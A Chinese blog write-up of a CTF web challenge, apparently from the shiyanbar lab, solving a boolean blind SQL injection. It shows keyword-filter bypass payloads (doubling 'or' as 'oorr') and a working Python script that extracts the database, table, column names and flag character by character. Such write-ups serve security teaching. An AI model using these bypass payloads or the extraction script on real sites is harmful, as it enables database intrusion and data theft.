实验吧 认真一点

最新推荐文章于 2021-07-24 10:05:03 发布
最新推荐文章于 2021-07-24 10:05:03 发布
阅读量7.1k 收藏 4
点赞数
分类专栏: CTF 学习 文章标签: CTF SQL注入 web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xingyyn78/article/details/79747404
版权

        本实验是输入id获取结果,查看页面源码,没有什么注释信息。随便输入个1,结果为You are in ...............,其他的id显示为You are not in ...............

        使用Burp suite进行模糊测试,结果为or部分sql命令都可以使用。

        但是使用or命令注入失败,但是从模糊测试来看是没有屏蔽or关键字,应该是后台删去了or关键字。使用oorr进行替换,当后台删去or时,or左边的o与右边的r新形成一个or关键字。

      因此可以通过判断形成的SQL语句结果结果是否为1确定查询内容的正确性,首先确定数据库名长度。构造id=0'oorr(length(database())=len)oorr'0判断数据库名长度。len是要确定的长度。使用burp suite进行破解,发现len=18。


       然后对数据库名爆破,针对每一位数据库的字母进行爆破。以第一位为例,可以看出爆破结果为c或C。整个数据库名可以全部爆破出来。数据库名为ctf_sql_bool_blind。其中id=0'oorr((mid((user())from(y)foorr(x)))='%s')oorr'0中的foorr是为了避免删除or,在删除or后形成for。


        可以通过构建相应语句爆破库中表名及列名及列中元素值。本打算先爆破数据库中表的长度,但是测试到30多位依然不通过,直接爆破表名,表应该有两个,一个为fiag,另一个为users。不知道为什么后面会有一堆-------,在本地数据库测试时只有表名。使用爆破语句,id=0'oorr((select(mid(group_concat(table_name separatoorr '@')from(x)foorr(1)))from

(infoorrmation_schema.tables)where(table_schema)='ctf_sql_bool_blind')='y')oorr'0;x为位数,y为字符。

        为了方便也可以写脚本。从表名上看flag应该在表fiag中。


        直接对fiag表进行列名爆破,使用爆破语句id=0'oorr((select(mid(group_concat(column_name separatoorr '@')

from(x)foorr(1)))from(infoorrmation_schema.columns)where(table_name)='fiag')='y')oorr'0;只有一列,列名为fl$4g,

对列中值爆破。使用payload:id=0'oorr((select(mid((fl$4g)from(x)foorr(1)))from(fiag))='y')oorr'0;最终爆破出flag:flag{haha~you-win!}但是flag中-是个错误的字符,就想flag个后面多余的--,最终试出-替代的是' '.即flag{haha~you win!}

        用于爆破的python脚本。

# -*- coding:utf8 -*-

import requests

chars ='~abcdefghijklmnopqrstuvwxyz_0123456789=+-*/{\}?!:@#$%&()[],.'

len =len(chars)

url=r'http://ctf5.shiyanbar.com/web/earnest/index.php'

mys=requests.session()

true_state=b'You are in'

result =''

# 爆破数据库长度 18

#    payload = "0'oorr((length(database()))=%s)oorr'0"%(x)
#
#    myd={'id':payload}
#
#    res=mys.post(url, data=myd).content
#
#    if true_state in res:
#
#        print(x)
#
#        print('true')


#爆破数据库名 ctf_sql_bool_blind

# for x in range(18):
#
#     for y in chars:
#
#         payload = "0'oorr((mid((database())from(%s)foorr(1)))='%s')oorr'0"%(x+1, y)
#
#         myd = {'id': payload}
#
#         res = mys.post(url, data=myd).content
#
#
#         print(str(y))
#
#         if true_state in res:
#
#             result = result + y
#
#             print('true'+str(x)+str(y))
#
#             break
#
# print(result)

#爆破表名 fiag@users

#爆破列名 fl$4g@id@username@password

for x in range(50):

    for y in chars:

        # payload = "0'oorr((select(mid(group_concat(table_name separatoorr '@')from(%s)foorr(1)))from(infoorrmation_schema.tables)where(table_schema)='ctf_sql_bool_blind')='%s')oorr'0"%(x+1,y)

        # payload = "0'oorr((select(mid(group_concat(column_name separatoorr '@')from(%s)foorr(1)))from(infoorrmation_schema.columns)where(table_name)='fiag')='%s')oorr'0"%(x+1,y)

        payload = "0'oorr((select(mid((fl$4g)from(%s)foorr(1)))from(fiag))='%s')oorr'0" % (x + 1, y)

        payload = payload.replace(' ', chr(0x0a))

        myd = {'id': payload}

        res=mys.post(url, data=myd).content

        print(str(y))

        if true_state in res:

            result = result + y

            print('true'+" "+str(x)+" "+result)

            break

    print(result)





LuckyZZR
关注
专栏目录
实验CTF-web
code_lab
02-27 6438
登陆一下好吗类型:sql注入已经过滤了/ # -- select or union |等,但是没有过滤单引号payload:username=pcat'='&password=pcat'='原sql语句为:select * from user where username='用户名' and password='密码'拼接后为:select * from user where username='p
实验
qq_42137684的博客
02-24 805
1.变异凯撒 把flag转化为ascii码,加密密文转化为ascii码, 因为是凯撒加密,所以思考移动的位数,分别是加了5,6,7,8.。。。  所以移动的位次是从5递加   得到结果    ascii码值转化,得到flag, flag{Caesar_variation}。 2.奇怪的短信   根据题目提示,是奇怪的短信,然后一串不长的阿拉伯数字,把手机键盘...
认真一点!-实验
Xi4or0uji
06-05 3079
这个题其实是个布尔盲注题,怎么说,正常是you are in,报错是you are not in,触发waf是sql injection detected然后fuzz一下,图我就不贴了,做的时候忘了截下图结果大概是过滤了and,空格,逗号,union,+这里有个坑,fuzz的时候or是可以用的,但是尝试id = 1'/**/or/**/'1'='1的时候报you are not in,不应该啊试了...
实验CTF(认真一点!)
欢迎光临
12-13 1852
输入1 输入2或者其他内容 看来只有输入1猜显示you are in 输入其他都是you are not in  输入; 过滤了: union 空格 逗号 % and ^ sleep substr | # ; 发现or 没有过滤 先看看可以用哪些来代替空格 经过测试  /**/  可以代替空格 于是构造 id=1'/**/or/**/1='1 按理来...
实验吧(1)
Monkey233333的博客
08-19 350
实验吧真是一个神奇的地方,里面的东西表示全部都看不懂,emmmmm  ,加油!好好学习!  案例:忘记密码了! 在实验吧里面打开解题链接,然后就会跳转到一个输入密码的页面,当然你是不知道密码的,所以这题是寻找密码。 是这样的一个页面,然后随便输入一串数字,一般来说都是错误的,然后你打开网页的源文件   在网页控制台上复制代码,就可以解出a的值。  ...
实验吧WP(web部分)【简单的登录题,后台登录,加了料的报错注入,认真一点,你真的会PHP吗?】
taozijun的博客
05-22 7450
一. 简单的登录题这道题一点也不简单,用到cbc字节翻转攻击等技术,先跳过这题,想了解可看实验吧上pcat大神的writeup。二. 后台登录这道题
c语言实验报告评语大全,实验报告总结
weixin_36416418的博客
05-18 2883
导语:在这次实训里,让我知道还有很多地方的不足,还有许多的技术等着我去摸索,等着我去学习。下面是由小编为你整理的java实验报告总结,欢迎大家阅读。java实验报告总结篇一伴随着新年钟声的到来,我不知道我是否是应该高兴还是悲伤。因为伴随自己三个月的华迪实训即将结束。转眼之间三个月的华迪实训就这样在忙...高校实验室是培养高层次人才和开展科学研究的重要基地。下面我们来看看实验报告总结,欢迎阅读。实验...
测量学实验报告.doc
01-15
测量学实验中要认真,有时目标稍微偏一点,读盘上读数就会有变化,误差就会增大,或许超出容许值范围,结果就要重测,浪费很多时间。读数时最好由一个人来读数,这样可减少误差。计算是一个谨慎、复杂的过程,需要...
大一计算机实验报告excle,excel实验报告总结
weixin_42117224的博客
07-24 2545
导语:在这次实训里,让我知道还有很多地方的不足,还有许多的技术等着我去摸索,等着我去学习。下面是由小编为你整理的java实验报告总结,欢迎大家阅读。java实验报告总结篇一伴随着新年钟声的到来,我不知道我是否是应该高兴还是悲伤。因为伴随自己三个月的华迪实训即将结束。转眼之间三个月的华迪实训就这样在忙...高校实验室是培养高层次人才和开展科学研究的重要基地。下面我们来看看实验报告总结,欢迎阅读。实验...
计算机原理 做实验报告,微机原理实验报告心得体会
weixin_29731589的博客
07-16 2582
微机原理与接口技术 实验心得实得这学期通过对微机原理和微机实验学习,对微机系统和它的工作原理有了的了解。微机实验课,总共做了十几个实验,回想起来受益匪浅,主要是加深了对计算机的一些硬件情况和运行原理的理解和汇编语言的编写汇编语言,它是和机器语言最接近的,用它来编程序,会比用其它高级语言要快得多。实验课程加深了我们对汇编语言指令的熟悉和理解。不仅巩固了书本所学的知识,还具有一定的灵活性,发挥了操作,...
实验认真一点
Assassin
01-31 3119
真的很久很久没碰过这个玩意了,真是不会了,而且这个题目本身就不是很容易,搞得我也是满肚子邪火,很气。这个题目主要难在它吧过滤和ban结合到了一起了。我们还是先看题目,首先拿到题目看到输入id=0和输入id=1结果不一样,这就奠定了盲注的基础了 然后我们肯定要fuzz一下,结果如下 禁了union、and、substr,sleep,堵住了时间盲注、联合查询注入的路子,而且还把逗号禁止了…这
实验吧-----IHDR
weixin_40709439的博客
08-09 4082
解题链接: http://ctf5.shiyanbar.com/stega/IHDR.png 有点坑哈,点开链接发现图片因存在错误而无法显示,一开始我是以为题目炸了,直接跳过。后来才知道。。。坑 可以利用脚本下载 import requests import io,sys sys.stdout = io.TextIOWrapper(sys.stdout.buffer,encod...
#实验吧--MISC
DVK
12-08 796
1.MD5之守株待兔,你需要找到和系统锁匹配的钥匙 GET方式提交一个key,得到key的md5。 几次提交发现:系统生成的md5是随机的。联想随机数据发现:提交速度快时系统的md5是不变的。 因此可以猜测:系统的md5是否是和时间有关?尝试用时间的几个组合。。。未果 试试直接用py的获取时间函数。 成功了。 这题要熟悉一下1、py request包的使用,2、py time.time...
实验吧_ROPBABY
weixin_44681716的博客
05-04 412
实验目的 用过这次实验去检验我们前期对栈溢出的掌握程度 实验文件 链接:https://pan.baidu.com/s/14fPpj6nULpywKwMv21r7rA 提取码:qbp9 实验步骤 首先检验ropbaby的保护机制 发现栈是no canary found,我们可以进行栈溢出。 首先对文件进行静态分析 ...
实验吧-简单的sql注入 Writeup
baynk的博客
07-28 428
又弄了一个,虽然说不难,但是这个有点蛋疼- -,有些地方坑了好久。。。 过程 一开始就是简单的输入数值进行查询,加引号后发现有报错。 单引号闭合,试过了#和-- 都被过滤了,没法使用,所以试试自己闭合,这次是OK的。 回显点应该只有一个,就是name了,这里就不试order by 了。直接union select,但是union select好像都被过滤了。试了下双写,发现过滤的时候如果最后不是...
实验吧_pilot
weixin_44681716的博客
05-04 485
实验目的 用过这次实验去检验我们前期对栈溢出的掌握程度 实验文件 链接:https://pan.baidu.com/s/1riY3T8_tcNUb_08ltAd3mA 提取码:5d4d 实验步骤 首先对pilot的保护机制进行检验 发现程序没有开启任何保护,且有可读、可写、可执行段,说明我们可以进行栈溢出操作。 对文件进行静态分析: 其实pilot前面的一大段都没有什么用,我们只需要看输入函数...
实验吧——WEB-FALSE
迷风小白
04-12 2734
FALSE hint:sha1函数你有认真了解过吗?听说也有人用md5碰撞o(╯□╰)o 查看源码 <?php if (isset($_GET['name']) and isset($_GET['password'])) { if ($_GET['name'] == $_GET['password']) echo '<p>Your password c...
实验吧———小苹果
落花四月
03-29 950
今天我很开心,因为我有了第一个粉丝,这也在指引着我,让我继续努力着!我会加油好好学习,坚持每天为你们这些 小可爱更新更优质的文章! 永远爱你们的 ————新宝宝 1:最低位亲吻; 解题思路:这题正常的套路应该是取出每个像素的最低位(0或1按照0黑1白不行的话再反色)来得到二维码,不过我们不走寻常路,将bmp在画图中另存为png格式就可以了,因为我们png时偶然发现左上角有二维码的感...
实验吧--天下武功为快不破
qq_41281571的博客
07-31 465
实验吧–天下武功为快不破 知识点: 在python中,对于base64加密解密方法的流程和注意点 先要引入base64库,import base64 加密: 结果=base64.b64encode(要加密的字符串) 解密:结果=base64.b64decode(要解密的字符串) 千万要注意:要解密的字符串要符合base64的格式,比方说后面要有两个等号。而且,解密后的值并不是字符串类型。也...
评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值